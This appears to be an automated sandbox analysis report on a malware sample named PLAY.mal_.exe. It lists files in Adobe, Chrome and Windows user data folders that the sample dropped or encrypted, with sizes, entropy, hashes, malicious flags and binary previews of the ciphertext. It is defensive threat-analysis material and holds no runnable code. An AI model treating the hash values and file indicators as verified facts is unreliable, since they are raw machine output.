        Preview:.?.|sf..G..}.,/.9w.........._b.s.....~.I...1b.w.o..V$......".~.....c............k..HJf.. .%<]F..m=.._..F,w...y.L.M.s*z<w. U........L6.6...I.s...n.9x.....A.t.......G[.Uq.m*...cL/..y......y..|...oX.%6.x..+..........U..n-VU.?3.w.%.J.B.[.6..w..a,..I.....Cb.b=.hl'.y..=.J.....o.~v..N...?.P....i.$.B|...l.....c. ..k.........i+F`M...yb..5y..5...wBf.%...i.9F...^.=S.s0...F.!~8..#1W.i....V.[...q.._.2.iL...0...'..Eb..;/).LU.......W%....._H..@SD...U.../,...ic.W ..('..k..Q.9AE..G.I.}.-..h.KZ....DL........J&.\...T...m.aI....J.*Y.F....H.1n\.Y.N...).-...UR?Vv.5Y..G..Kx...9^..E.'.M....w.O t..=.u>....]...3@Jc.UY.Mec...GDu.^.DT#A..*.N.B..../.J..-...j.#..d...XS...8......L...Us&3*j!....x...t....=.P20.^...`...j.....HB.1h8...K>0...ax...j..d.o:-x4..?_/.._....y..'....7..&0.D..f......T.....&6.HTJb.....g...c.../E...y.<lM.H......9.....@....<.&...K~2e......kJ...X4.j..k{K&*.%.@..H._..Z..1\._..../..n.......6...%;8....(..M.......w..8..h*.[...G.:....B3o.\F.}...70.\.....

        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):246264
        Entropy (8bit):7.999275928541738
        Encrypted:true
        SSDEEP:
        MD5:28EAE57619D12446315D6D3F1A271BBC
        SHA1:9FFEDABFCFBFF845A3BC9128D43CB259BE1099BB
        SHA-256:9363EC22CC57308B2792FED4674E6E6A0814C679360037FD70983EDA5D709F9E
        SHA-512:D1B6FC2770555D2D5AC5435FB4F43AF4B21518FA8C1427380219BBB2D9E42125851B786A190E104057929A6139F6210647EB5F3D4CC5FB74B7F7A334251CB0BA
        Malicious:true
        Preview:Q.f%.N.......RDQ......$!\.eyi..e.....b.]rF.. L..EJ..O|.1c&..I#j8V..j..<7...Yk..R..=.......E5......w..+.J1.l....{H.,.;.J........qC...=?8q;!*.b^......{.....U5j..+b7.4.r...h.(....F,......h....e.N....a..VV]z....m.h.2{.~LE(..]4..,.:AwK...H5O..2..8=....{4.U..\.C.>.].V....Y.X.'...q..r..A.j.[..rT#3.....L.*..}[t.-.5.T..G..<..*\.'_.......b.cn...1..2.3.../.0..@.(.0..ov.t.....m..'$S..l.$Z...g.......r..{.ZF.F..as*.../...B..v..~..I....L...v9CD.&.F...1.#..3..JR0..e..v...,...O^..@t.h)#pr....X..?..^.0.o.a..qx..u|Cr...U..@...x.o...%...8)._Q......G.|...H3..U.ar......p..A.... .;N[.`Z.8xR.E...7.2...Z...yy..../0......./.....l@A...p>5Q.wtZ...._.XF..(-qL.{...GF.(h..t....p...l4d....l....D.?..D(.,2....Z....~.w,...'...^.....U9VY.Fw9|g...4.l#.2..8.P.S...D..v7....|.3t...m>...Y. zz1.-..Z.cPR.?..Aq7.._.;&mg......K..3......&.......Cl.....3.........(../,\.t.e.'.R.....J.........u...Xv.....7t....GKY"N....Z.R&..t...u>X.mg....9.dr...G.......5....>.....[.3...o.....Ak

        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):13368
        Entropy (8bit):7.985222809958045
        Encrypted:false
        SSDEEP:
        MD5:F47767B4F0C08FFA362F6C81B181D749
        SHA1:6586914BF7F5DED2C6004740482998FDA02B5843
        SHA-256:D1FC51CC667425947C4DFFB14CF29A4154A5B3FF8DAA88BB3AE3B0149C776B4A
        SHA-512:C191CD0F4A630B3DAAF0DCB8B9951952807998A037318D29D94AD125905AD9B610CA1F5CC9004864227001666A1B9DBB4C5F6F9E91F431E7C89E36E10F8C8AF7
        Malicious:false
        Preview:.x.h......P.t......C._.\3..t.Y.;....B.W.KW.i.[..8..i.n............p..+Ro.............F..C@.("...wv+.Mz.@V.\..*.[`...j...{n.,.............J`.s......?......3...|...oC..Oy...!......J...DG.....O.a.5.0Y...n..x .k....b.CY5...>o"....5..!m.......R/..{v......a....0H.l.......l.V\.Q.g.z:.".^D9..c........,.O.."......1f..........fm;Z..W.i.....d!./P..\...".....l...Zo...6.C.........?.u1..9..u8C6[...[...N.n...(nt....fZ.4.....`.+......O...s.....H.Z.;(y;]}..J4.%q....F......Z7.3&.0G.g...J..TTLT...r..OYI~[k..w|/.=.3...,XM.bm.t.6rn.UB.G..I$:..h6z.Vq...Me...fh.$.6.... .-.U..=}B<.,~...s@..=.zM.DR...t)........gF8..w..yn.Q........0.J....Yw...+...q b..O...2.....#..8.]"...H^.{.X6.X.........M.}a3.......>S..n-....%..e..rP+.#..?.G..32..g=...%...$@H.3.u'GF-=......m....+..P.....#...hkC.....S...||*...a..T.4F...Qk.Ki.|0.....d..-e..cF...)....k..t^+6d0y...n..'$o....`...=..S..P3.T$.9./...J......is.....7..b.]......}b:.WC..}/..;..._..gx-..|5.}e. .d.X>..s.QA_.}......_

        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache.bin

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):64664
        Entropy (8bit):7.996923181166142
        Encrypted:true
        SSDEEP:
        MD5:A837B096BAE6894351953FE36DC00B61
        SHA1:734C3A82B23C2F09C5FCD4B379642ED84BA4AB30
        SHA-256:043C56907094F1B5EED78EF02D2EFE93F68163A577E2A8DFE87A074725BEE47B
        SHA-512:406FC337AFBD1DE7583F05E541DD222BA6BADE8452F671B0B46B3458D30EFE6C50A51A205C7B480D93F322F1C40B87DF0CFFB2E4F40DACFFEB34ADF34AFA8281
        Malicious:true
        Preview:...d...Z)....F..JVT@.e.#.......v.I..s....q..r.8....5...o.Q.....$$.0...Wn..aR.:........v.9K+.x..[.t:..n..) L]~....r..# >1..rx(..[.......|u...0...PM.....TU...M.9..>XV..G.k.N*.e...E..>1..s.1.........+o....W..r...c.~.!S.L.........../b.`Rw.p>....Nhc.-.....|.X..x~I.H^.|...........PD;m....t.#1.].[j*Pm...j..]...E..I.._f.X...r...{a..6".p >.....@.I..$.h.k..B)....P..P..a;.an..C.....#..II...zVq.;...y.6lF...U"qcsj......a..K..s.p`|j....).{.(.n..1...,~..&=SwK.....b@.o....Wb5.Ul.~..;..Q..k[i....N.."...;..O .$.....[P.....a.}...9..G.&..'.C.....a...L].##.}B5H@..K.T........Z..>.......3...<A.?...G..wgFx....._s.........:.).x.Y...x....T..t......`IX.L, ~7.....4l.M-E.h.F6..F?.L...[.......a..s.iI..U..i...jI......s\.q..R..B?....n"LZ)[ ...!..+[..>.QC......\.y..f.?6..<^J....p..wo_}9.......V..*.L..p@#....Ndq.......}..%.w..x\G._.=....T.../5.W.$......Q.....;......SG:....k.Q4...g.-.f.....{O....7.g.=....9=hM7......8......aF.J.<x...$.$...W/.).]...Cb..Z....%...Z.\..t

        C:\Users\user\AppData\Local\Adobe\Color\ACECache11.lst

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1672
        Entropy (8bit):7.876584370446784
        Encrypted:false
        SSDEEP:
        MD5:AD31F327EDF227958989F0E43F42D08C
        SHA1:B83EE2C0347127299229E8BCBBF0650CF3D8AD5C
        SHA-256:C7FC02861F11A033622DC3116967E9837E5B3D072DCE672B23604867C4EA5C89
        SHA-512:729EA15B97AFF3F88F132BCBA1E09B9388D50DCFDD3C322D9EDF765F66D7D53E8150838991C879F7AB743326950425D9078578748EE9E3DE835A38A7DFD99D98
        Malicious:false
        Preview:.4(.....PrG.o...{.....Ib(4vL-$..*h......ew.-..=..X.t......6[^.-'022...s .tp8g.O..j..Sp.S........H....;....O.......OA.....~B....CJJ.y....,.."X.~.Z........0....L.M...,aR...i....>.>..G.:..'..:..9n..0.i..H 9...h...6.......u....6^F..<..VE}.D..[F..n......,6.>.......e....../...~-Q.oOKk..&cp.-...%....qa.!.c.U|2..J/...W..Z..*c....u....yoi_!83....69.Z!..........z.....1l.&..'...;.,.....<.Nd.-.1..q...!......".U7...kA.c.z4.~&.&A..W.4i..u.....n....K..d\...$.....{....{.O............v!+.[.1."...|.z..;}P....~.U.yQ..._....._.....A..m..+.y...&...p,)E.M..6yW..Y...|y.H`.. .$...z.........V.(..T..U.|.!.I>.............................vn....U|.oY..t.`+..`......^'cBl.<......].H.F......H.VD...'v..s_!..r.3.d]$.drK...K.R.-....0...i.B..T.>.......,S...[.w...;..u.p9..#.sM.......N.0.....W.....>[..9IR.....*........m......yp.....+..7s.>.N3\..,..`..*i.Tp&R..<2E`...o_Ob++...U/.T...h.3Mo1..PC.N.q/...#.2i=.....0@u~.5...[....)....u.Hi.....CgD.;L.. |..W.I?...t..h.Tl..V[...

        C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):9272
        Entropy (8bit):7.977284903661137
        Encrypted:false
        SSDEEP:
        MD5:6E9AD3DFA21E29063494FF195FC3D76A
        SHA1:D116E3FFB1227D414F2F6BECDF3A1E7819B4140D
        SHA-256:62ABF7E3CE483B7FA1311E3E5C4C6F7BECDD31FC917F14A5708D4ABFE27C39CB
        SHA-512:E5EF91F45796C03D7CBAE8FB8C744670F8037DFF0B4993739032DFCD926E496DF4AC6BD39684731A97E239174E13549887B8513A8A34F6216B50041B9E831B2B
        Malicious:false
        Preview:Yi....;.._k.<.3..ey.I....c6%.pd..\>..W........FCz..4..Xv..C..ld...Vf...UWPf.,.c..._...4.....f^3W.....:.1..,.!^QE:(L..............4.N.4.0\......C.../8.%.`...C.....*...m......N.e.*[:5.H{...P.VD.......B....C+.....R..o/fse.B..;p... .?....5eu......seB,f..x.......o..0#..g.......S..5.'U...J...?.ya.?..}.k..3.kf'..Io....Q..Q....Q<.=v.^"....".5....s#..S....>..^..?..p...]...A..oTv.uL4w..qF......*h...a....wF.O.H.......*.une..n.....`...h....1Mo..X#.x).U.&..+w.4..n\.Z..=%.3EO.S'<...^s....).~...}...=C...\..-8..}=h........e...k+`2.......!!.-.........e6..>O..3$.7G.w..AW.=..qf..]J>.s"..s?[...>....^..XkWr.6...<..w..}.:..... 3.V....Y...o...&.l..F. .#.<D0x.Y~....o.$.r&....*..0h[.w.I......O.,..*^...k.'.T.....At#../...V.wa...~l%.......4...u."........_.G....Hg....X.....<x.|F{.WN.bY.9K..o..9(l........a..Q?....CO.f...9....+..e..j.-.zw...}.....p.e.....7lL.\.(..n..^...........U|..#e.:...\...+.mC o.I.....-("X......p..`..}..NT7+......6.....vh....JD.l./F..k.)V.).p

        C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00001.jrs

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):3146808
        Entropy (8bit):7.999941895617903
        Encrypted:true
        SSDEEP:
        MD5:EE3038E5C13C53B2558D48F82213699D
        SHA1:E118A3A4AFC96EC462B762D8161D1AAA8E9650A6
        SHA-256:981BF502D671C8EBE33EB17DFDB0FA1F8AC836E7FDAEA5AE243F54FE98D00A41
        SHA-512:8A5652E7C8DED1413BDAE718C78092F50343A9593570C85825A2F83971614937173E1A31597751D08F5B309DBF079B2779808DA364F375B679D5B37F50F375C2
        Malicious:true
        Preview:5...........J..y..1.2..^.........F..&.0.>.Z..%...;...C..R...vj.D.&..E+.q3.................r......R7..]......)J...0.S.8.../.7..T}.weZ.,..I ..*.+V.G...|.pYP..E...@[0.YH..=.`+.......-..(.B.U.@w~.9v.....M...y.#.H..l.cZ..*..."..1.Q....tj....F...1.Kw>..0..N+..l...>.U......Z/f'."...X..s...L.>8-`+....y.y.. ..d.#...n.....L..J.}........H.e.Y.;R!...W.v..>..UvX.z.K*Ca...@.c...W.pC.d..T.........a....>G...~..6...(.O.&A.&.P?..4....T..-I2.D3.A+.|.....$..8...K...7.<..>.lg....-...#..-.l..Y........(.s...W;_...X.3H.!.-Vk3.#P-3...H.z.....!Q..\.-T..nq.. .p.Lr>,......}'..C......;b...$;..S7.........8..z...m-...|...<b...G(...R`.kPD-UP+..5....s.(z.i...q..0.p.....`..OxL..eT..^...6..-...a?A.q....Os..gSK....M5...!.3Dk.8....B..&W.\5|.....r...M....y.X...|....(..>.....3w<cP.....bI.......r*....?..\.-..$.q.#..MI..xb.p3s..[...6;...8.'^j..!2c...}u.m..7.>.S....../,......3/.0_...YP{..L'....%.-uH..x...HWlt.1.1..;{&.B;...h.4.......[7OJ..sGFe.t9.y..;..z.n..5.....m:..........u...

        C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00002.jrs

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):3146808
        Entropy (8bit):7.999936394071733
        Encrypted:true
        SSDEEP:
        MD5:25D718323F893CE7C052AD05F407F83E
        SHA1:D7894C8CDA438D8BD598588F44B6721A109F8BB4
        SHA-256:F58D6D1C61D5CCB055CAB98060F2AA674D0C29C122EEB5560C161D213153A1E3
        SHA-512:5B8923A65799CE957538354B51358099D34574C42647E45292A9B252C73250AC66AED84BFA270BC770D7BF8EF870F56F8F94BC274D1C4520E8B4917F3DBE0686
        Malicious:true
        Preview:.nc.+.w...&~....".....2..#XgsJ.j.J....l....D.lig..a.g4...H.=..........G..t5..K..p.hU...S.v.p..4....N2..z.g..AE.`.........>.yT.D"6'6..!..JC8....[.pN.$Zj.&..6.=:..`...&@...DPS..g.....B.....2.H...]\..7.YAc...;../U..cv#(.....L^...5....y...yc.......zb..I.C..6>......)..].y3o2....a.&..j..![..4...C..<...J.b...x[.7.&.uB.L ...v..t.|?........\=.O.o..1.{g.....i..-...~...3.....6]...w'....`..h(..!,6.4...6........py....6.Wk.C.5..O....X5...IvZiW.0%..O..6.<./../.F5X....T..Np=..+s..+..0.../|..yT.........%[.>..\:.....{y$..e.:..<.HXt..,...6.w...C.B.F.4.B.LV..2..x....|.8../....L.Q.^.m.......s...pEH.5BN..r.xF..6....x..Qy.v... .y.pG9.......%..@.....Ey...$y.l`.Y.M./.+I..Y0.x.v.ht.....<m...|..vV..+@...csE..]...9H.M3;.o..m1.1....8........|3...C5t.{b{.`(..k.)n...........=..3'...cZE.8...(.......!,..........JJ.i..v...23...Q_&.A..B.@Q.'F)...,ur.i...;............K=e.....{..}O.".n.X..<(U.fZ.3+..F...$...O.._\k....m.;..#.f$F.3:.b....t..........yK..q.Q../K.Xv"..

        C:\Users\user\AppData\Local\Comms\UnistoreDB\USStmp.jtx

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):3146808
        Entropy (8bit):7.999942459003882
        Encrypted:true
        SSDEEP:
        MD5:17217F45D49EB08921B3B8E1A68A9D75
        SHA1:C951439ABD2EC4058D6BF2CA671930EDC6B8842B
        SHA-256:078E0DC085256A51C5BE11918BA2D8E67E90D0261FD603A066FCD4DF5FE77505
        SHA-512:14E55CFE40090A25FF3EE9344A9C5F7442C6673466FEF84CA77711DEB82953824FC44046BF67B3F7A073F949FBA11677723DC9D82F035E55D7E8DEF90721DE8C
        Malicious:true
        Preview:!,y-fK..1F.Yr...^.y.....x[...rzR-..-q.+g..R.%t"jG.<.dJ..').`0......1MW>b.2.(.H..:.w.s..`A~...H.......w.....W&A.....$t..s.L....o..,.l....V>... f.".)M.;..)^JW...'.^..b...p....]......z..2)..&%.....E..]...$..)........l.s.(..6.....}l..S..F...f)..;Z.E^.bW9...2%n..K8.#l?...b..^..m.*.+Q.i.N....sX..s..J.....E..]R.$....4.....r..!..KLB.6.k~.?...xI'...eR.r.I......e.W..!.^.E.../[n$...b.......{.-i_.u.GM.n..>a......hZ.".~.2.SP,a./.......I..C....T.5....+O. Z.B..o.".-..$......C..:.*,..F..}........W...k..3....L.."..$.V.(.u..,..u.}~Z..as&...4........w..e.f..z.....6.+.r.w....i}4...p.....B.7.............:w....T.!*....2...R..kV...B.\....5........S.6.U<...zO...2....]?{<x.Ew.....W....h.G..!.........l.....?.2-...}H...[7.6.i..d..!..J..J........>e..Y.5...I.I.Z.~..S.....,E.A...wHyS@>.....j...E.+...<.c..uX...Hn. ...[.Y......_.P8....?.......<B....=.w.G....Yo...~....m...d..~."q..Z.....lL...?...A.....V.W,..4.q.n...."......"...#....q.L.L.H?...V.:..$.8.%.,+.s..5:.C>..c

        C:\Users\user\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.cdp

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):3064
        Entropy (8bit):7.935969376888348
        Encrypted:false
        SSDEEP:
        MD5:BAC1BC0C53AB133E3F0912DC51D530F2
        SHA1:8A25E4979C191B75D454EC5520AF4E1CEE121DC4
        SHA-256:A31827FDAC373BB01C17C0D9CC8E89B31A1B833C9FEE645AA695B214AA9244A4
        SHA-512:62FC6B60EA2BB77BA56E180DF2CC37F788B0D19DA6430B0E558A6C544B39CB879ABB1343D7AEDFD8BA21673F6D2976EA5939B826A86E7D5B4450BF1584FD6817
        Malicious:false
        Preview:.nB..Z....g...m...BA.....3...d.`.>R...Z....t..E..y'..8O.3..]#..8@.Gb...Rs....9.......|.K?......VsQ..&....D..N.`j.].`<.'.\.P..C..-......h..S..t.S...>.^S...r..(&...>?u.ml......Au?Eq..._....0'...T...Xwt..sB...i..3....2.r..d)L..W.?T..@..$j.=..w.,ts..N.o......Z.f....b.P. ..N+5.nQ;.z[...q.z^..{...A...sy...[...4.^B..yG/#.r.q....{..K......v.."$.12&..&.I..;Sq.x.y..g.|..(.SG..Ku)..;.r...D.."..G%.D.6...|..(a...v,..z..KC...p.P..S..S...%.G.X.....I.^;e.gF!..i....8..2Ez`...1jFit!....'._.s..U.f.TyfM.eu..f.sI. .0.a...u.ih8..(...|...F...(.y\.a.i..R...Z........Yu...F..q..ID.L}.,..y..r.=rox.!.<......-.7.G...u.,.$...t..f.=.....ud48{Q....Y&&...[.H.;.....[.^.. ......&D.I...o.w..r..M.F..\.D=..M.....c.U.....A@a..W.Q.u......#."KV.....p....`.%..-..J...pu8P.]...k...-...evs.'.......}p..*.$e.:$W3e.u..sr.Tq.S^B...6.....F.. P^..9...R..65..P....j...X.@....Mu.\....x^^.J..7ki{....O.9....A}.'..F=..,;....C]26....~..:.-.t......+.F....O...)...S.+P.Q.D*.<.....

        C:\Users\user\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):66632
        Entropy (8bit):7.997308459686149
        Encrypted:true
        SSDEEP:
        MD5:8C90C6E68E2337E739D6F0ED8C918687
        SHA1:A6D90ABF964EEA333AC8C73DAB06B19E0E1FA98D
        SHA-256:FB6B75D66909C9A6B5B240E6CB4F19737F4A10506DC8DBEB956B2B137455AE12
        SHA-512:78B941B96B3B7284BDB20FE81C15D10BD224BC208CD329ED4666DB4B5065C6DC417400F5FFD91C5A8F5512F775118D47FBEC06FF9F53594DA519E8BC7505BB76
        Malicious:true
        Preview:65..n.8o..?...y...........4..k._...H0.?....R...s^.];...B56D...%...g+..P...f..G..`.3e.~...........G...yJ.qX....E../.\..S:m....h.d...R_..y.....3.0..........xoa...9......ds.U.../..QT..a...."[..N...9.......O#]}.........d.(GL.{.&#.m....~..$.s..,...O..s4.u.X&z.`.).b........yQ...5{.%BLJ4...v.;.P.w....d......VY....B............./o7....vF.#..l.y_....R.F.e...~..BQ...y.....@..I....t.{v_.t..K.@.b..{.$y.*'T...5b?B6.m.C...E...O1..Z.@.b4I<.[n..]...n&....E&....e..B.h.sZ.p~x..z?..L.../.r.m...r...S.w1.........x.~l.....o.h&B...b.W..'..?U.fC..i......U.r..M}c8..n.t..@"~...k.).=...../.P..N\..e.[s:Hwe.1.]T.\C.Tb.2...C..&f.te)_Wv.[.x...{..?..8-...%.M..l .ih...AH...[.%.S...!.'s. .....5...5M.lZ..f...F...]..G..ky.Z..U....@......X.....v=......F..(.q....]....#.9l.@ ]....$..-.%..WQ{.{.a.U...SJF+.@.[.x.j=...5....f<..X..4/[h.N...0.1.v{.$...Oy.4s9...XZ.....e>.j.i.PzO.1..........aD........<....s....1Q....nN]L..e..I3y`).P.d.....|. .1...(..hV.vs..!..E...:F*.`..f......7{.;Y

        C:\Users\user\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):65536
        Entropy (8bit):0.8177188065750048
        Encrypted:false
        SSDEEP:
        MD5:4706B9BF68C463A27EED471A404A97D2
        SHA1:3301B2B41470AC7D9965811CB4CD75EAA47E3D67
        SHA-256:019C72DC3E6CB47B18E18EE79DA24D6EF3762EAB301CC1094E071C209394256A
        SHA-512:2390D35CED8BCDD08F37BA00DCF5A37CD20E787736D0912BA300B9E2E1FBEBBFF0039E4E267539DDB92C2346B680B56F552AB274D24D9E2EC671F5EDDB7D7D8E
        Malicious:false
        Preview:&..L...@.b......6...7..o.....!TOM..55.0..7V.c_....x.Z.L..M.R....IEw/4e...l.+.9..|.D;x....(Kv:.b(.GS.}..IV4.....=.`].......(D.....mM.3.8....t9.c0..8....N....|.W..hV.4..$Q.V0...W.".7.~.....!.....*.....C...........H..:..w..x...Y....E.F...hz..d..XX.(_...r..../v...O.G.PPp..e).Zt..c@...VCF.1E.u..:.~8........@....%xN..g...X.v.X..*....9H;...y.%4C..:.....Y...:8......rx..G..Xq..l..b.v=...O.......g/..._|.gt=n..%..@...4N._#.+}@.n7.E.l:..J$..>....w.g.p0W...........6.....!.W....^"...A..C.q...a...,..@.D...-..{.".{.....T....t..7....J6.+.@..zp.Z1.4..Z.MI...4g...v.9)W..{...8.8.B0F}..............S>.U...... .^Z..).E......{\........-..j,..CF2...O.Sg..:Tj...Z......]....x.|i..".9.=].....v...I..d.#.$. I...f...*....V~.4'..?D(.2..y./.A(kW...$...|eF..b.E..o.....w.`N..H\..y...!4e..F.Y ...W.....VV...=.t.g...D`a....5."U.[z....C...%.=..../.6.z.O.*\..CR.pnh#...]...`"W<04,{. HqdG...-OB.@Sx.0.Y.......-.......s..._ljLx5.%Z.M.tH.....>.c%!..d....xL.i;....!.e.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-62FC0DB0-1450.pma

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):4195384
        Entropy (8bit):7.999961093256565
        Encrypted:true
        SSDEEP:
        MD5:3B03F78680A90FEB0E9EA5B276075C0C
        SHA1:6AFD0150E6DD099225727947B63BD4768ED783EF
        SHA-256:F251CDE4EF643F706274F4E3A989C06080D3553AD7F91F61E152B4C2D4FFDC2A
        SHA-512:34088939FB9725BD9CD5A3DAB0799B0B7C80102C22ED926D7FCE211E846B41783502F37761961E99A99FAABD4F266A82B0FED2D2DC6540CD18434E5EC96009FE
        Malicious:true
        Preview:J..l..}...1Vh.^2.&. ......@*.H...`...w... ..`..u.C.'..^.j..eV..,..mp..k.\......|...L..9..A7*,.L..M..<%U...s....*..C.a|I&..}....+.......'jI=..&.wt..U..\u..3.xvl..z...@z.8..!...H|G.......n...E.......Gz.R..B.V..H.....<L..n1a.<].~.jU.u.8y...*..4.T.*v;Mw..CR.~.=uX.............Q...-.Y...[..2.|......qA....%..#E....\..:..zf>.....t....5J1...=c...[...'. ..%..9...*.~.%...<....r>h.-@..t,H)..^.8?......Z.J.[.#G..F..D.Kv..]$a(...^..D........>M.~.bB.X@..J...L..qGRT..8.sa..n2_QK.5.t...g...V..f_.~ ||uZ#.....(:.s.jo...j3...W=3.zM}/f..y....Y.Ls.%% .2.@.....T..Ph....+....Z\...g..Q../../.....nxh8..q...h....a.......M ....Y(.....z.k.+...........=...r..u.2....]......6....|Q...NX.9%z.H.ByS.;...T...\ax....`.tU...,...my.....L$.o.I.i.<.x..d8|.4...,.z.....7...8..I.Xsnq.D[.F*&....p?.h..Y.s'#...n~..px...2P..;....|..Zt..>96....P...{...."nR?.C.6N.d......G....u....S.G.4m..RO..f...e2'...<G...t.-....1..UD.')........?..!.....<Je..l3.S.%.7.0..W...@:'1....\.^...R....]2.p+..|...^D

        C:\Users\user\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:SysEx File - ADA
        Category:dropped
        Size (bytes):1049656
        Entropy (8bit):7.999833768859235
        Encrypted:true
        SSDEEP:
        MD5:18311F79D24CB1DE864231DB38C76EC3
        SHA1:D856BEB3A56B93EC3BDAA0C84CBB23D90533C80C
        SHA-256:5C3E6CE8ED40A46576AEC432CED4FF9049349B1FC0C9397B3CEF5A3DFBE0831A
        SHA-512:0801A92D61FFB84AFF294823A430D82078B5FB3E3260BBB39B78A61BCC72B880A0DF23BF9A1872EE5C1102C09E6F31EF3CFF5C2FA4EDD187EA37CF460F16C2E4
        Malicious:true
        Preview:...-........Q.F.1...i.....h.cc....k..0...S..Gl..........|...[.k.~:......cM.8......2r.u...o.+.......J..u.....ti..*.T.`\...lL.EZ......r.V...5.m.....4.9\..yeBm/....t....k%.X;.q._e6.....{^.v..n....9.O.a./...0...o.tK.fm]..4a..+..@...}.~;.4C.}t..g[....n}.G'y.f>...#T#.@..<.......aB.:."....w:.....g..u8.'D.).H.a.`.......>hf.9....l.~..J%......$.t._V..c].w...{9.n..w..`.......}S...t..T%.80..D..2..T.....%c '..Y.h...p...g..Jy...L.Y0....W@.mg....Z...vvz1G.n..pW)..V._...@P}.?....._..Q&L>..-\70.)..&..|p..".B..4....&D...T.=.....u......-.#.?{.i...>.>4.$.z.r8...Z.y..o?...];=....!=xp..M.:.r..H..D......v.Z...}8..>!.)..o.Z..b..n.:.....ut..o..y..%...-..Q...T...D.{4...eK..y.<.+..^3;~.D...E..Z..P.x..T7.X..>.7{.'re.. . B..N%v/Yy^.s..+".`.....R.e.d1...8.........8i.y.......O.s.(.i....%.>NKu...s7.=|..k.L.....4..v9....3d.%._....6W.v\)F...<.........$G.6.... .kU.}&.Z.....)U.ZB`]........]..@....x..%..^.1q$"[.,..".G....63.|.1...&.....7..y.4.c..!."pgQ..TJ..*.>L$k...9..Tv

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1112
        Entropy (8bit):7.840284779547489
        Encrypted:false
        SSDEEP:
        MD5:FF4286923AD1026E5055CB427BB627D7
        SHA1:2ECA043A5D89631BB40616759AC0A5FAB7A4A37E
        SHA-256:0E151A0CC35863C26005FCD0EED1BE053CF62076F1A39CB9CC7AAD33EBC2CD22
        SHA-512:09B7D466D21DD60E1E29FF113FBDA26C94A3087D855DCF231F004E423D54FF6DAFDACE91155AB3528AC94850559E0A3D07372EE06727621F67998483ADD98AC3
        Malicious:false
        Preview:.c9.:c-......I.q....xw..~?/.ER.+.3......9.J...T..U.|.!.I>..........................>p.).....Vo.b.Av2..coy.....M.....E.P...`.Lj.w........=..8.I8utA.j_o..........Dl.....#D..<6.Gp.{...dX<.|MHN.C.?..o..d.......D..>.;.W].l..Y.y...7'....#..(.u..5.6N.o0J|....[Q.5.,.?...:..i:..rr..mn......(....f/.o...?o.G.....q...!.~.AU....`.I.......}..40(f..m.{V..C.N=G.R.J.A.7....t$....4.....jU..[k]...Q.d...G.k~.#....1.{..W../...(.;......Nm....-P..@....5........./......F7.......E.r.......+.@..)..h..A.K....x.V2........P..}..3I./S..F..b.5._.....y..b..J.31{..Z2q*.. *g.*.v.a..AZ.......){..Y.J..e...p..(.......FO....4I?L.:.n.No........5......&&&......~...%..)...#.....F..t.S..a....i' '.?8.8)..z."R.V..p.x....let..........f....Q|.z.k..{.v..t2........@...}.....%.5....C.....*.........h!.*....fI...H.4.iJ..%..^q..}...D...}`P."9.l. ..3.8^..iO.o$..q.<..@..Ca..B...J.^y..T....s .....7.>....,...g.../.....+.+.-gy...b........j+b.F.~...p~...b.......8....u.BO....f...j`.1{..

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Affiliation Database

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):33848
        Entropy (8bit):7.994104060385747
        Encrypted:true
        SSDEEP:
        MD5:034E096A768386C216E77E8BD91E6329
        SHA1:DE7F09FBBAAC72D7F008AE5B6D57ADF194D55D54
        SHA-256:88C013342A38D79236EEFD9699782869B0C39B25788E31C6BFB69054E6342353
        SHA-512:FE683A425ACF4B26B212E8331949EDBA0B9ECDC857C514FFD82545D976E09AD6254C893D6278A193F8FD64F9C749C2D738E6B784C86B24CAD26C54A3347B8CC8
        Malicious:true
